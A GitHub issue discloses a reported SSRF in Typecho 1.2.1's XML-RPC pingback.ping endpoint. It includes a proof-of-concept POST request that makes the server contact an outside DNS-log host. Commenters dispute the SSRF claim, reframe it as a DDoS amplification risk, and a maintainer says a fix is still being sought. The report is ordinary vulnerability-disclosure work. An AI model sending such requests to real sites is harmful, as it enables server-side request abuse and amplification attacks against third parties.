Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Typecho v1.2.1 SSRF vulnerability #1647

Open
Hebing123 opened this issue Nov 27, 2023 · 3 comments
Open

Typecho v1.2.1 SSRF vulnerability #1647

Hebing123 opened this issue Nov 27, 2023 · 3 comments
Assignees
@joyqi
Labels
security This is a security issue

Comments

@Hebing123
Copy link

Vulnerability report

Description
Attackers can pass malicious URLs as parameters to the pingback.ping method by constructing malicious requests. The first parameter in this method allows passing any URL, and the server will send the request with that URL as a parameter. Due to the lack of effective input verification and filtering mechanisms, attackers can exploit this vulnerability to initiate server-side requests, which may lead to security issues such as sensitive information leakage and server resource abuse.
Proof of Concept
image

POST /index.php/action/xmlrpc HTTP/1.1
Content-Length: 263
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Host: 192.168.160.147
Connection: Keep-alive

<methodCall>
<methodName>pingback.ping</methodName>
<params>
<param>
<value><string>http://npnjie.dnslog.cn/</string></value>
</param>
<param>
<value><string>http://192.168.160.147/index.php/archives/10/</string></value>
</param>
</params>
</methodCall>

image

问题出现的环境

  • 操作系统版本:Ubuntu 20.04
  • Apache/NGINX 版本:Nginx 1.22.1
  • 数据库版本:5.7.34
  • PHP 版本:7.4
  • Typecho 版本:1.2.1
  • 浏览器版本:Chrome/114.0.5735.289 Safari/537.36
@changyu233
Copy link

Pingback模块的设计之初就是为了向其他博客网站确认你的文章是否被引用,而你提到这里有SSRF漏洞的问题在之前的版本出现过且已经处理了。
在/var/Widget/XmlRpc.php文件中的pingbackPing函数中已经对目的host使用Common::checkSafeHost()方法进行了安全性检测,限制访问内网与保留地址,限制了除HTTP和HTTPS协议以外的其他协议。
所以我认为这里存在漏洞是不恰当的。

@Hebing123
Copy link
Author

Hebing123 commented Dec 8, 2023
edited

Hello, this vulnerability may not exist as an SSRF vulnerability.

Based on your description, there may be attackers using the Pingback module to cause DoS or DDoS attacks on other sites.

This's the relevant literature. Its level of harm has constituted a security vulnerability,I'm not planning to apply for a CVE number for this vulnerability, but I hope you can fix it as soon as possible.

https://www.trendmicro.com/vinfo/us/threat-encyclopedia/vulnerability/5759/wordpress-xmlrpc-pingback-ddos-vulnerability

Thanks for your reply.

@fenbox fenbox added the security This is a security issue label Jan 4, 2024
@joyqi
Copy link
Member

joyqi commented Jan 26, 2024

I'm still looking for a simple and reliable way to prevent the pingback interface from being used for DDOS amplification attacks.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees

@joyqi joyqi

Labels
security This is a security issue
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
4 participants
@joyqi @fenbox @Hebing123 @changyu233